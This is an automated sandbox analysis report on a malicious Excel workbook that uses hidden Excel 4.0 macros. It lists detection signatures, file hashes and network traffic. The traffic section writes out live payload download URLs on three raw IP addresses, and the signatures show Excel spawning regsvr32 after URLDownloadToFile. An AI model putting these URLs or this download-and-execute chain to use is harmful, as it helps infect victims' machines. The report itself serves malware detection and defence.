Windows Analysis Report ClaimCopy-539408676-12022021.xlsb

Overview

General Information

Sample Name: ClaimCopy-539408676-12022021.xlsb
Analysis ID: 532685
MD5: 4b4aacfd637f34a8c9111d80578bf275
SHA1: 86b477fdaa06a4fcd7e863af0b7dc9321b9978e4
SHA256: 04a5fd7cd4e3a83f37c9d9b5152a0985278a9d4a6cd749935fdffd1292fdc49f
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: ClaimCopy-539408676-12022021.xlsb Virustotal: Detection: 10% Perma Link
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Section loaded: unknown origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.4:49763 -> 185.82.126.78:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.4:49763 -> 185.82.126.78:80

Networking:

barindex
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /939602286691.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /939602286691.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /939602286691.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /939602286691.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /939602286691.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /939602286691.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknown TCP traffic detected without corresponding DNS query: 185.82.126.78
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:18:18 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:18:19 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:18:22 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:18:23 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:18:22 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:18:23 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: http://158.69.133.78/939602286691.dat
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: http://158.69.133.78/939602286691.dat2
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: http://185.82.126.78/939602286691.dat
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: http://185.82.126.78/939602286691.dat2
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: http://185.82.126.78/939602286691.dat2:8
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: http://185.82.126.78/939602286691.dat78
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: http://45.142.211.62/939602286691.dat
